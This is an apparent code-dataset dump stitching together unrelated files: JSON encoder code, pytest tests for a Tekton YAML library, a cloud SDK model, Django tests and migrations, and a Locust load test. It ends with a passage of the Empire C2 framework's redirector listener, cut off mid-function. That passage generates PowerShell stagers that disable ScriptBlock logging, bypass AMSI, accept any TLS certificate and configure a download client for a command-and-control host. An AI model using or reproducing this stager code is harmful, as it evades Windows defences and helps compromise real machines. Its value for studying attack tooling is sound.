# Subclasses of int/float may override __str__, but we still
# want to encode them as integers/floats in JSON. One example
# within the standard library is IntEnum.
yield buf + convert2Es6Format(value)
elif isinstance(value, float):
# see comment above for int
yield buf + convert2Es6Format(value)
else:
yield buf
if isinstance(value, (list, tuple)):
chunks = _iterencode_list(value, _current_indent_level)
elif isinstance(value, dict):
chunks = _iterencode_dict(value, _current_indent_level)
else:
chunks = _iterencode(value, _current_indent_level)
yield from chunks
if newline_indent is not None:
_current_indent_level -= 1
yield "\n" + _indent * _current_indent_level
yield "]"
if markers is not None:
del markers[markerid]
def _iterencode_dict(dct, _current_indent_level):
if not dct:
yield "{}"
return
if markers is not None:
markerid = id(dct)
if markerid in markers:
raise ValueError("Circular reference detected")
markers[markerid] = dct
yield "{"
if _indent is not None:
_current_indent_level += 1
newline_indent = "\n" + _indent * _current_indent_level
item_separator = _item_separator + newline_indent
yield newline_indent
else:
newline_indent = None
item_separator = _item_separator
first = True
if _sort_keys:
items = sorted(dct.items(), key=lambda kv: kv[0].encode("utf-16_be"))
else:
items = dct.items()
for key, value in items:
if isinstance(key, str):
pass
# JavaScript is weakly typed for these, so it makes sense to
# also allow them. Many encoders seem to do something like this.
elif isinstance(key, float):
# see comment for int/float in _make_iterencode
key = convert2Es6Format(key)
elif key is True:
key = "true"
elif key is False:
key = "false"
elif key is None:
key = "null"
elif isinstance(key, int):
# see comment for int/float in _make_iterencode
key = convert2Es6Format(key)
elif _skipkeys:
continue
else:
raise TypeError("key " + repr(key) + " is not a string")
if first:
first = False
else:
yield item_separator
yield _encoder(key)
yield _key_separator
if isinstance(value, str):
yield _encoder(value)
elif value is None:
yield "null"
elif value is True:
yield "true"
elif value is False:
yield "false"
elif isinstance(value, int):
# see comment for int/float in _make_iterencode
yield convert2Es6Format(value)
elif isinstance(value, float):
# see comment for int/float in _make_iterencode
yield convert2Es6Format(value)
else:
if isinstance(value, (list, tuple)):
chunks = _iterencode_list(value, _current_indent_level)
elif isinstance(value, dict):
chunks = _iterencode_dict(value, _current_indent_level)
else:
chunks = _iterencode(value, _current_indent_level)
yield from chunks
if newline_indent is not None:
_current_indent_level -= 1
yield "\n" + _indent * _current_indent_level
yield "}"
if markers is not None:
del markers[markerid]
def _iterencode(o, _current_indent_level):
if isinstance(o, str):
yield _encoder(o)
elif o is None:
yield "null"
elif o is True:
yield "true"
elif o is False:
yield "false"
elif isinstance(o, int):
# see comment for int/float in _make_iterencode
yield convert2Es6Format(o)
elif isinstance(o, float):
# see comment for int/float in _make_iterencode
yield convert2Es6Format(o)
elif isinstance(o, (list, tuple)):
yield from _iterencode_list(o, _current_indent_level)
elif isinstance(o, dict):
yield from _iterencode_dict(o, _current_indent_level)
else:
if markers is not None:
markerid = id(o)
if markerid in markers:
raise ValueError("Circular reference detected")
markers[markerid] = o
o = _default(o)
yield from _iterencode(o, _current_indent_level)
if markers is not None:
del markers[markerid]
return _iterencode
def canonicalize(obj, utf8=True):
    """Serialize *obj* in canonical (JCS) form: sorted keys, compact output.

    Returns UTF-8 bytes by default, or a str when ``utf8`` is false.
    """
    encoded = JSONEncoder(sort_keys=True).encode(obj)
    return encoded.encode() if utf8 else encoded
def serialize(obj, utf8=True):
    """Serialize *obj* preserving key insertion order (no canonical sorting).

    Returns UTF-8 bytes by default, or a str when ``utf8`` is false.
    """
    encoded = JSONEncoder(sort_keys=False).encode(obj)
    return encoded.encode() if utf8 else encoded
| 35.327586
| 158
| 0.527737
|
794b202049eb7db557e22ec2af28478e1271df92
| 5,195
|
py
|
Python
|
totkn/test/test_totkn.py
|
powellquiring/pycli
|
ecc5beec84833b978dfa41259ab3ac306617fc55
|
[
"Apache-2.0"
] | null | null | null |
totkn/test/test_totkn.py
|
powellquiring/pycli
|
ecc5beec84833b978dfa41259ab3ac306617fc55
|
[
"Apache-2.0"
] | 2
|
2021-04-06T18:19:56.000Z
|
2021-06-02T03:28:55.000Z
|
totkn/test/test_totkn.py
|
powellquiring/pycli
|
ecc5beec84833b978dfa41259ab3ac306617fc55
|
[
"Apache-2.0"
] | null | null | null |
from totkn import *
import totkn
import pytest
import click
import yaml
import attr
def test_syntax() -> None:
p = Pipeline(name="pl")
s = p.to_yaml()
click.echo(s)
def verify(expected, tekton_obj) -> None:
    """Assert that *tekton_obj* serializes to YAML equal to *expected*.

    ``expected`` may be a YAML string (parsed first) or an already-parsed
    structure. The rendered YAML is echoed so failures show the full document.
    """
    # isinstance (not `type(x) == str`) so str subclasses are handled too.
    if isinstance(expected, str):
        expected = yaml.safe_load(expected)
    result_str = tekton_obj.to_yaml()
    click.echo(result_str)
    # safe_load is the documented shorthand for load(..., Loader=SafeLoader).
    result = yaml.safe_load(result_str)
    assert result == expected
ubuntu_task_str = """
apiVersion: tekton.dev/v1beta1
kind: Task
metadata:
name: mytask
spec:
steps:
- image: ubuntu
"""
def test_task_readme_example1() -> None:
verify(ubuntu_task_str, Task(name="mytask", steps=[Step(image="ubuntu")]))
def xtest_task_readme_example2() -> None:
click.echo(Task().to_yaml(check=False))
def test_task_str() -> None:
step = totkn.Step("ubuntu")
task = totkn.Task("mytask")
task.steps = [step]
verify(ubuntu_task_str, task)
def test_task_steps() -> None:
step = totkn.Step()
step.image = "ubuntu"
step.name = "echo"
step.command = ["echo"]
step.args = ["01 version"]
task = totkn.Task("the-task")
task.steps = [step]
verify(
"""
apiVersion: tekton.dev/v1beta1
kind: Task
metadata:
name: the-task
spec:
steps:
- name: echo
image: ubuntu
command:
- echo
args:
- "01 version"
""",
task,
)
def test_task_missing_step() -> None:
task = totkn.Task("mytask")
try:
task.to_yaml()
except MissingAttribute as ma:
assert isinstance(ma, MissingAttribute)
def test_pipeline_str() -> None:
task = totkn.Task("mytask")
p = totkn.Pipeline(name="pipelinename")
p.tasks = [PipelineTask("ptask", task.ref())]
pt = totkn.PipelineTask()
pt.name = "pipeline-taskref-name"
verify(
"""
apiVersion: tekton.dev/v1beta1
kind: Pipeline
metadata:
name: pipelinename
spec:
tasks:
- name: ptask
taskRef:
name: mytask
""",
p,
)
def test_trigger() -> None:
task = totkn.Task("mytask")
p = totkn.Pipeline(name="pipeline")
p.tasks = [PipelineTask("ptask", task.ref())]
pt = totkn.PipelineTask()
pt.name = "pipeline-taskref-name"
pr = PipelineRun("pipelinerun-$(uid)")
pr.pipelineRef = p.ref()
verify(
"""
apiVersion: tekton.dev/v1beta1
kind: PipelineRun
metadata:
name: pipelinerun-$(uid)
spec:
pipelineRef:
name: pipeline
""",
pr,
)
tt = TriggerTemplate("theTemplateTrigger")
tt.resourcetemplates = [pr]
verify(
"""
apiVersion: tekton.dev/v1alpha1
kind: TriggerTemplate
metadata:
name: theTemplateTrigger
spec:
resourcetemplates:
- apiVersion: tekton.dev/v1beta1
kind: PipelineRun
metadata:
name: pipelinerun-$(uid)
spec:
pipelineRef:
name: pipeline
""",
tt,
)
def test_trigger_exception() -> None:
tt = TriggerTemplate()
pr = PipelineRun("pipelinerun-$(uid)")
tt.resourcetemplates = [pr]
try:
tt.to_yaml()
except Exception as e:
assert isinstance(e, MissingAttribute)
return
assert False
def test_trigger_binding() -> None:
tb = TriggerBinding("theTriggerBinding")
verify(
"""
apiVersion: tekton.dev/v1alpha1
kind: TriggerBinding
metadata:
name: theTriggerBinding
""",
tb,
)
def test_event_listener() -> None:
el = EventListener("the-listener")
elt = EventListenerTrigger(
binding=Ref("theTriggerBinding"), template=Ref("theTemplateTrigger")
)
el.triggers = [elt]
verify(
"""
apiVersion: tekton.dev/v1alpha1
kind: EventListener
metadata:
name: the-listener
spec:
triggers:
- binding:
name: theTriggerBinding
template:
name: theTemplateTrigger
""",
el,
)
def task_dict(name):
    """Build the minimal dict form of a Tekton Task manifest named *name*."""
    metadata = {"name": name}
    return {
        "apiVersion": "tekton.dev/v1beta1",
        "kind": "Task",
        "metadata": metadata,
    }
def xtest_task_description():
t1 = totkn.Task("secret-env-task", description="the description")
t1.params = [totkn.Param()]
click.echo(t1.params)
t1.steps = [totkn.Step(image="ubuntu")]
d = task_dict("secret-env-task")
d["metadata"]["annotations"] = {"description": "the description"}
verify(d, t1)
t2 = totkn.Task("secret-env-task")
t2.description("the description")
t2.steps.append(totkn.Step(image="ubuntu"))
verify(d, t2)
import examples.lab1_simple.gen as lab1
import examples.lab2_parameters.gen as lab2
def lab_test(gen, fs) -> None:
    """Compare the YAML documents produced by ``gen()`` with fs/expected.yaml.

    Fails with an assertion (not an IndexError) when the document counts
    differ, then compares documents pairwise.
    """
    with open(fs + "/expected.yaml") as f:
        # safe_load_all is the documented shorthand for
        # load_all(..., Loader=SafeLoader).
        expected = list(yaml.safe_load_all(f))
    actual = list(yaml.safe_load_all(gen()))
    # Check counts first: the original indexed `expected[i]` while iterating
    # over `actual`, which raised IndexError instead of an assertion failure
    # whenever gen() produced extra documents.
    assert len(expected) == len(actual)
    for exp_doc, act_doc in zip(expected, actual):
        assert exp_doc == act_doc
def test_example_lab1() -> None:
lab_test(lab1.gen, "examples/lab1_simple")
def test_example_lab2() -> None:
lab_test(lab2.gen, "examples/lab2_parameters")
| 21.032389
| 78
| 0.621944
|
794b2104592feb626c66a9e626caf3f468464b2a
| 5,572
|
py
|
Python
|
huaweicloud-sdk-sms/huaweicloudsdksms/v3/model/volume_groups.py
|
huaweicloud/huaweicloud-sdk-python-v3
|
7a6270390fcbf192b3882bf763e7016e6026ef78
|
[
"Apache-2.0"
] | 64
|
2020-06-12T07:05:07.000Z
|
2022-03-30T03:32:50.000Z
|
huaweicloud-sdk-sms/huaweicloudsdksms/v3/model/volume_groups.py
|
huaweicloud/huaweicloud-sdk-python-v3
|
7a6270390fcbf192b3882bf763e7016e6026ef78
|
[
"Apache-2.0"
] | 11
|
2020-07-06T07:56:54.000Z
|
2022-01-11T11:14:40.000Z
|
huaweicloud-sdk-sms/huaweicloudsdksms/v3/model/volume_groups.py
|
huaweicloud/huaweicloud-sdk-python-v3
|
7a6270390fcbf192b3882bf763e7016e6026ef78
|
[
"Apache-2.0"
] | 24
|
2020-06-08T11:42:13.000Z
|
2022-03-04T06:44:08.000Z
|
# coding: utf-8
import re
import six
from huaweicloudsdkcore.utils.http_utils import sanitize_for_serialization
class VolumeGroups:
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
sensitive_list = []
openapi_types = {
'components': 'str',
'free_size': 'int',
'logical_volumes': 'list[LogicalVolumes]',
'name': 'str',
'size': 'int'
}
attribute_map = {
'components': 'components',
'free_size': 'free_size',
'logical_volumes': 'logical_volumes',
'name': 'name',
'size': 'size'
}
def __init__(self, components=None, free_size=None, logical_volumes=None, name=None, size=None):
"""VolumeGroups - a model defined in huaweicloud sdk"""
self._components = None
self._free_size = None
self._logical_volumes = None
self._name = None
self._size = None
self.discriminator = None
if components is not None:
self.components = components
if free_size is not None:
self.free_size = free_size
if logical_volumes is not None:
self.logical_volumes = logical_volumes
if name is not None:
self.name = name
if size is not None:
self.size = size
@property
def components(self):
"""Gets the components of this VolumeGroups.
Pv信息
:return: The components of this VolumeGroups.
:rtype: str
"""
return self._components
@components.setter
def components(self, components):
"""Sets the components of this VolumeGroups.
Pv信息
:param components: The components of this VolumeGroups.
:type: str
"""
self._components = components
@property
def free_size(self):
"""Gets the free_size of this VolumeGroups.
剩余空间
:return: The free_size of this VolumeGroups.
:rtype: int
"""
return self._free_size
@free_size.setter
def free_size(self, free_size):
"""Sets the free_size of this VolumeGroups.
剩余空间
:param free_size: The free_size of this VolumeGroups.
:type: int
"""
self._free_size = free_size
@property
def logical_volumes(self):
"""Gets the logical_volumes of this VolumeGroups.
lv信息
:return: The logical_volumes of this VolumeGroups.
:rtype: list[LogicalVolumes]
"""
return self._logical_volumes
@logical_volumes.setter
def logical_volumes(self, logical_volumes):
"""Sets the logical_volumes of this VolumeGroups.
lv信息
:param logical_volumes: The logical_volumes of this VolumeGroups.
:type: list[LogicalVolumes]
"""
self._logical_volumes = logical_volumes
@property
def name(self):
"""Gets the name of this VolumeGroups.
名称
:return: The name of this VolumeGroups.
:rtype: str
"""
return self._name
@name.setter
def name(self, name):
"""Sets the name of this VolumeGroups.
名称
:param name: The name of this VolumeGroups.
:type: str
"""
self._name = name
@property
def size(self):
"""Gets the size of this VolumeGroups.
大小
:return: The size of this VolumeGroups.
:rtype: int
"""
return self._size
@size.setter
def size(self, size):
"""Sets the size of this VolumeGroups.
大小
:param size: The size of this VolumeGroups.
:type: int
"""
self._size = size
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
if attr in self.sensitive_list:
result[attr] = "****"
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
import simplejson as json
if six.PY2:
import sys
reload(sys)
sys.setdefaultencoding("utf-8")
return json.dumps(sanitize_for_serialization(self), ensure_ascii=False)
def __repr__(self):
"""For `print`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, VolumeGroups):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
    """Return True when the two objects are not equal."""
    are_equal = self == other
    return not are_equal
| 24.986547
| 100
| 0.554738
|
794b223a5f6cbcf3524333c7a298307f5527ee8f
| 664
|
py
|
Python
|
estore_project/users/tests/test_urls.py
|
Jawayria/estore_project
|
ad0c2f30b9a4d8a02b37ea29dfb2259635c55517
|
[
"MIT"
] | null | null | null |
estore_project/users/tests/test_urls.py
|
Jawayria/estore_project
|
ad0c2f30b9a4d8a02b37ea29dfb2259635c55517
|
[
"MIT"
] | 1
|
2021-05-19T06:41:50.000Z
|
2021-05-19T06:41:50.000Z
|
estore_project/users/tests/test_urls.py
|
Jawayria/estore_project
|
ad0c2f30b9a4d8a02b37ea29dfb2259635c55517
|
[
"MIT"
] | null | null | null |
import pytest
from django.urls import resolve, reverse
from estore_project.users.models import User
pytestmark = pytest.mark.django_db
def test_detail(user: User):
    """The detail route round-trips: reverse() builds the expected URL and
    resolve() maps that URL back to the users:detail view."""
    expected_url = f"/users/{user.username}/"
    assert reverse("users:detail", kwargs={"username": user.username}) == expected_url
    assert resolve(expected_url).view_name == "users:detail"
def test_update():
    """users:update lives at /users/~update/ and resolves back to itself."""
    url = "/users/~update/"
    assert reverse("users:update") == url
    assert resolve(url).view_name == "users:update"
def test_redirect():
    """users:redirect lives at /users/~redirect/ and resolves back to itself."""
    url = "/users/~redirect/"
    assert reverse("users:redirect") == url
    assert resolve(url).view_name == "users:redirect"
| 26.56
| 74
| 0.679217
|
794b2268f3c910fddebc9c4d3e9f66fe1d1fa7ba
| 772
|
py
|
Python
|
backend/Backendapi/bookdata/migrations/0020_notecomment.py
|
f0rdream/SkyRead
|
798b4dd35b7e6be41e5fed4537d3f6034d20494e
|
[
"MIT"
] | null | null | null |
backend/Backendapi/bookdata/migrations/0020_notecomment.py
|
f0rdream/SkyRead
|
798b4dd35b7e6be41e5fed4537d3f6034d20494e
|
[
"MIT"
] | null | null | null |
backend/Backendapi/bookdata/migrations/0020_notecomment.py
|
f0rdream/SkyRead
|
798b4dd35b7e6be41e5fed4537d3f6034d20494e
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
from django.conf import settings
class Migration(migrations.Migration):
    """Add the NoteComment model: a free-text comment a user attaches to a Note.

    Migration files are applied by checksum/state comparison, so the schema
    content below must not be edited after this migration has shipped.
    """

    dependencies = [
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
        ('bookdata', '0019_note_shared'),
    ]

    operations = [
        migrations.CreateModel(
            name='NoteComment',
            fields=[
                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
                ('content', models.CharField(max_length=1000)),
                # Links each comment to the commented note and its author.
                ('note', models.ForeignKey(to='bookdata.Note')),
                ('user', models.ForeignKey(to=settings.AUTH_USER_MODEL)),
            ],
        ),
    ]
| 29.692308
| 114
| 0.612694
|
794b239d7aeac4ed946beb44757762101f798569
| 997
|
py
|
Python
|
apps/incidents/migrations/0002_auto_20181122_1103.py
|
seanlefevre/openduty
|
34ab21117f114ccc808d8b0aa2cb801c819bdb86
|
[
"MIT"
] | 145
|
2016-04-11T06:53:13.000Z
|
2022-03-22T05:15:49.000Z
|
apps/incidents/migrations/0002_auto_20181122_1103.py
|
seanlefevre/openduty
|
34ab21117f114ccc808d8b0aa2cb801c819bdb86
|
[
"MIT"
] | 78
|
2017-09-24T10:59:49.000Z
|
2022-02-12T07:36:27.000Z
|
apps/incidents/migrations/0002_auto_20181122_1103.py
|
seanlefevre/openduty
|
34ab21117f114ccc808d8b0aa2cb801c819bdb86
|
[
"MIT"
] | 30
|
2016-04-11T06:53:16.000Z
|
2021-12-29T11:39:26.000Z
|
# Generated by Django 2.1.3 on 2018-11-22 11:03
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Wire Incident to Service: two foreign keys plus a
    (service_key, incident_key) uniqueness constraint.

    Migration files are applied by checksum/state comparison, so the schema
    content below must not be edited after this migration has shipped.
    """

    initial = True

    dependencies = [
        ('services', '0001_initial'),
        ('incidents', '0001_initial'),
    ]

    operations = [
        migrations.AddField(
            model_name='incident',
            name='service_key',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='incident', to='services.Service'),
        ),
        migrations.AddField(
            model_name='incident',
            name='service_to_escalate_to',
            # Optional escalation target, hence blank/null with a None default.
            field=models.ForeignKey(blank=True, default=None, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='service_to_escalate_to_id', to='services.Service'),
        ),
        migrations.AlterUniqueTogether(
            name='incident',
            unique_together={('service_key', 'incident_key')},
        ),
    ]
| 31.15625
| 183
| 0.633902
|
794b2406f92c554dd6278e54904d215536ab9642
| 5,647
|
py
|
Python
|
locust/locustfiles/locustfile.py
|
tojatos/laser-tactics
|
538bef7ab03bf35c0ef27e195001f6f7f12c1ba4
|
[
"MIT"
] | 2
|
2021-12-12T03:45:18.000Z
|
2021-12-21T03:53:23.000Z
|
locust/locustfiles/locustfile.py
|
tojatos/laser-tactics
|
538bef7ab03bf35c0ef27e195001f6f7f12c1ba4
|
[
"MIT"
] | 1
|
2022-03-26T15:13:29.000Z
|
2022-03-26T15:13:29.000Z
|
locust/locustfiles/locustfile.py
|
tojatos/laser-tactics
|
538bef7ab03bf35c0ef27e195001f6f7f12c1ba4
|
[
"MIT"
] | null | null | null |
import csv
import time
from json import JSONDecodeError
from random import choice
import requests
from locust import TaskSet, task, HttpUser, between
import logging
# TODO figure out how to do setup for entire process?
# Load test fixtures once at import time; each spawned locust user pops one
# credential triple.  testdata.csv columns: username, email, password;
# the first row of each file is a header and is skipped.
with open('../testdata.csv', 'r+') as f_uc:
    reader = csv.reader(f_uc, )
    next(reader, None)  # skip the header row
    USER_CREDENTIALS = list(reader)

with open('../usernames.csv', 'r+') as f_u:
    reader = csv.reader(f_u)
    next(reader, None)  # skip the header row
    USERNAMES = list(reader)
"""
# For now this makes sure users are in database, run it if they aren't
for line in USER_CREDENTIALS:
username, email, password = line
requests.post("http://localhost/api/v1/users", json={
"username": username, "email": email, "password": password
})
"""
# this one is kinda useless
class RegisterWithUniqueUsersSteps(TaskSet):
    """Register a single unique account per simulated user, then idle forever."""

    def on_start(self):
        # Claim one unused credential triple for this simulated user.
        if USER_CREDENTIALS:
            self.username, self.email, self.password = USER_CREDENTIALS.pop()

    @task
    def register(self):
        logging.info('Register with %s username, %s email and %s password',
                     self.username, self.email, self.password)
        payload = {
            "username": self.username, "email": self.email, "password": self.password
        }
        self.client.post("/users", json=payload)
        # Park this user so the one-shot registration never repeats.
        while True:
            time.sleep(1)
# TODO debug
class FriendsModule(TaskSet):
    """Load-test the friends API: list friends, send friend requests, and
    randomly accept or decline incoming ones.

    on_start logs in with a unique credential triple popped from
    USER_CREDENTIALS and caches the bearer token used by every task.
    """

    def on_start(self):
        if len(USER_CREDENTIALS) > 0:
            self.username, self.email, self.password = USER_CREDENTIALS.pop()
        logging.info('Login with %s username and %s password', self.username, self.password)
        with self.client.post("/token",
                              headers={'Content-Type': 'application/x-www-form-urlencoded'},
                              data={"username": self.username, "password": self.password
                                    }) as response:
            self.token = response.json()['access_token']

    def _auth_header(self):
        # Bearer-token header shared by every request below.
        return {"authorization": "Bearer " + self.token}

    def _handle_random_request(self, action):
        """Fetch the pending friend requests and POST `action` ('accept' or
        'decline') for one picked at random; no-op when none are pending."""
        with self.client.get(
                "/users/me/friends/requests",
                headers=self._auth_header()) as response:
            logging.info(response.json())
            f_requests = list(response.json())
            if len(f_requests) > 0:
                req = choice(f_requests)
                with self.client.post(
                        "/users/me/friends/requests/" + action,
                        headers=self._auth_header(),
                        json={"id": req['id']}) as response1:
                    logging.info(response1.json())

    @task(10)
    def get_friends(self):
        self.client.get(
            "/users/me/friends",
            headers=self._auth_header())

    @task(10)
    def send_random_friend_request(self):
        username = choice(USERNAMES)[0]
        logging.info('Friend request to %s username', username)
        with self.client.post(
                "/users/me/friends/requests/send",
                headers=self._auth_header(),
                json={"username": username}) as response:
            logging.info(response)

    @task(3)
    def accept_random_request(self):
        # accept/decline previously duplicated ~15 lines each; now shared.
        self._handle_random_request("accept")

    @task(4)
    def decline_random_request(self):
        self._handle_random_request("decline")

    @task(1)
    def stop(self):
        # Hand control back to the parent user occasionally (weight 1).
        self.interrupt()
class LoginWithUniqueUsersSteps(TaskSet):
    """Log in with a unique credential triple and fetch the current-user profile."""

    def on_start(self):
        # Claim one unused credential triple for this simulated user.
        if len(USER_CREDENTIALS) > 0:
            self.username, self.email, self.password = USER_CREDENTIALS.pop()

    @task
    def login(self):
        logging.info('Login with %s username and %s password', self.username, self.password)
        form = {"username": self.username, "password": self.password}
        with self.client.post("/token",
                              headers={'Content-Type': 'application/x-www-form-urlencoded'},
                              data=form) as response:
            try:
                token = response.json()['access_token']
            except JSONDecodeError:
                response.failure("Response could not be decoded as JSON")
            except KeyError:
                response.failure("Response did not contain expected key 'access_token'")
            else:
                self.client.get(
                    "/users/me",
                    headers={"authorization": "Bearer " + token})
"""
class LoginWithUniqueUsersTest(HttpUser):
wait_time = between(1, 5)
tasks = {LoginWithUniqueUsersSteps: 5}
host = "http://localhost/api/v1"
sock = None
"""
class FriendsTest(HttpUser):
    """Locust user running the FriendsModule scenario against the local API."""
    wait_time = between(1, 5)
    tasks = {FriendsModule: 5}
    host = "http://localhost/api/v1"
    sock = None
""" Figure this one out later
class RegisterWithUniqueUsersTest(HttpUser):
wait_time = between(1, 5)
tasks = {RegisterWithUniqueUsersSteps: 5}
host = "http://localhost/api/v1"
sock = None
"""
"""
class LaserTacticsGuestUser(HttpUser):
@task
def users(self):
self.client.get("/users")
@task
def lobby(self):
self.client.get("/lobby?skip=0&limit=100")
"""
| 33.217647
| 117
| 0.573225
|
794b245680d3e5c55ac94f0297107e6ab5dc39c1
| 44,407
|
py
|
Python
|
lib/listeners/redirector.py
|
Gui-Luz/Empire
|
6f5eeff5f46dd085e1317cb09b39853a2fce5d13
|
[
"BSD-3-Clause"
] | 5,720
|
2017-02-02T13:59:40.000Z
|
2022-03-31T09:50:10.000Z
|
lib/listeners/redirector.py
|
VookiBoo/Empire
|
5aae31e7de591282773d2c8498af04ee4e8778f5
|
[
"BSD-3-Clause"
] | 866
|
2017-02-02T10:56:31.000Z
|
2020-01-17T07:47:05.000Z
|
lib/listeners/redirector.py
|
VookiBoo/Empire
|
5aae31e7de591282773d2c8498af04ee4e8778f5
|
[
"BSD-3-Clause"
] | 2,181
|
2017-02-04T10:28:41.000Z
|
2022-03-31T04:36:56.000Z
|
import base64
import copy
import os
import random

# Empire imports
from lib.common import helpers
from lib.common import agents
from lib.common import encryption
from lib.common import packets
from lib.common import messages
class Listener:
def __init__(self, mainMenu, params=[]):
    # NOTE(review): the mutable default `params=[]` is shared across calls;
    # kept as-is since it matches the signature other listener modules use.

    # Metadata describing this listener module in the Empire UI.
    self.info = {
        'Name': 'redirector',

        'Author': ['@xorrior'],

        'Description': ("Internal redirector listener. Active agent required. Listener options will be copied from another existing agent."),

        # categories - client_server, peer_to_peer, broadcast, third_party
        'Category' : ('peer_to_peer'),

        'Comments': []
    }

    # any options needed by the stager, settable during runtime
    self.options = {
        # format:
        #   value_name : {description, required, default_value}
        'Name' : {
            'Description'   :   'Listener name. This needs to be the name of the agent that will serve as the internal pivot',
            'Required'      :   True,
            'Value'         :   ""
        },
        'internalIP' : {
            'Description'   :   'Internal IP address of the agent. Yes, this could be pulled from the db but it becomes tedious when there is multiple addresses.',
            'Required'      :   True,
            'Value'         :   ''
        },
        'ListenPort' : {
            'Description'   :   'Port for the agent to listen on.',
            'Required'      :   True,
            'Value'         :   80
        },
        'Listener' : {
            'Description'   :   'Name of the listener to clone',
            'Required'      :   True,
            'Value'         :   ''
        }
    }

    # required:
    self.mainMenu = mainMenu
    self.threads = {}  # used to keep track of any threaded instances of this server

    # optional/specific for this module

    # set the default staging key to the controller db default
    #self.options['StagingKey']['Value'] = str(helpers.get_config('staging_key')[0])
def default_response(self):
    """
    Pivot listeners have no HTTP server component of their own, so there is
    no default page to serve; warn and return an empty string.
    """
    print(helpers.color("[!] default_response() not implemented for pivot listeners"))
    return ''
def validate_options(self):
    """
    Validate all options for this listener.

    Prints the first required option whose value is blank and returns
    False; returns True when every required option is filled in.
    """
    for key, option in self.options.items():
        is_required = option['Required']
        is_blank = str(option['Value']).strip() == ''
        if is_required and is_blank:
            print(helpers.color("[!] Option \"%s\" is required." % (key)))
            return False
    return True
def generate_launcher(self, encode=True, obfuscate=False, obfuscationCommand="", userAgent='default', proxy='default', proxyCreds='default', stagerRetries='0', language=None, safeChecks='', listenerName=None):
"""
Generate a basic launcher for the specified listener.
"""
if not language:
print helpers.color('[!] listeners/template generate_launcher(): no language specified!')
return None
if listenerName and (listenerName in self.mainMenu.listeners.activeListeners):
# extract the set options for this instantiated listener
listenerOptions = self.mainMenu.listeners.activeListeners[listenerName]['options']
host = listenerOptions['Host']['Value']
launcher = listenerOptions['Launcher']['Value']
stagingKey = listenerOptions['StagingKey']['Value']
profile = listenerOptions['DefaultProfile']['Value']
uris = [a for a in profile.split('|')[0].split(',')]
stage0 = random.choice(uris)
customHeaders = profile.split('|')[2:]
if language.startswith('po'):
# PowerShell
stager = '$ErrorActionPreference = \"SilentlyContinue\";'
if safeChecks.lower() == 'true':
stager = helpers.randomize_capitalization("If($PSVersionTable.PSVersion.Major -ge 3){")
# ScriptBlock Logging bypass
stager += helpers.randomize_capitalization("$GPS=[ref].Assembly.GetType(")
stager += "'System.Management.Automation.Utils'"
stager += helpers.randomize_capitalization(").\"GetFie`ld\"(")
stager += "'cachedGroupPolicySettings','N'+'onPublic,Static'"
stager += helpers.randomize_capitalization(").GetValue($null);If($GPS")
stager += "['ScriptB'+'lockLogging']"
stager += helpers.randomize_capitalization("){$GPS")
stager += "['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging']=0;"
stager += helpers.randomize_capitalization("$GPS")
stager += "['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging']=0}"
stager += helpers.randomize_capitalization("Else{[ScriptBlock].\"GetFie`ld\"(")
stager += "'signatures','N'+'onPublic,Static'"
stager += helpers.randomize_capitalization(").SetValue($null,(New-Object Collections.Generic.HashSet[string]))}")
# @mattifestation's AMSI bypass
stager += helpers.randomize_capitalization("[Ref].Assembly.GetType(")
stager += "'System.Management.Automation.AmsiUtils'"
stager += helpers.randomize_capitalization(')|?{$_}|%{$_.GetField(')
stager += "'amsiInitFailed','NonPublic,Static'"
stager += helpers.randomize_capitalization(").SetValue($null,$true)};")
stager += "};"
stager += helpers.randomize_capitalization("[System.Net.ServicePointManager]::Expect100Continue=0;")
stager += helpers.randomize_capitalization("$wc=New-Object System.Net.WebClient;")
if userAgent.lower() == 'default':
profile = listenerOptions['DefaultProfile']['Value']
userAgent = profile.split('|')[1]
stager += "$u='"+userAgent+"';"
if 'https' in host:
# allow for self-signed certificates for https connections
stager += "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};"
if userAgent.lower() != 'none' or proxy.lower() != 'none':
if userAgent.lower() != 'none':
stager += helpers.randomize_capitalization('$wc.Headers.Add(')
stager += "'User-Agent',$u);"
if proxy.lower() != 'none':
if proxy.lower() == 'default':
stager += helpers.randomize_capitalization("$wc.Proxy=[System.Net.WebRequest]::DefaultWebProxy;")
else:
# TODO: implement form for other proxy
stager += helpers.randomize_capitalization("$proxy=New-Object Net.WebProxy('"+ proxy.lower() +"');")
stager += helpers.randomize_capitalization("$wc.Proxy = $proxy;")
if proxyCreds.lower() == "default":
stager += helpers.randomize_capitalization("$wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials;")
else:
# TODO: implement form for other proxy credentials
username = proxyCreds.split(':')[0]
password = proxyCreds.split(':')[1]
if len(username.split('\\')) > 1:
usr = username.split('\\')[1]
domain = username.split('\\')[0]
stager += "$netcred = New-Object System.Net.NetworkCredential('"+usr+"','"+password+"','"+domain+"');"
else:
usr = username.split('\\')[0]
stager += "$netcred = New-Object System.Net.NetworkCredential('"+usr+"','"+password+"');"
stager += helpers.randomize_capitalization("$wc.Proxy.Credentials = $netcred;")
#save the proxy settings to use during the entire staging process and the agent
stager += "$Script:Proxy = $wc.Proxy;"
# TODO: reimplement stager retries?
#check if we're using IPv6
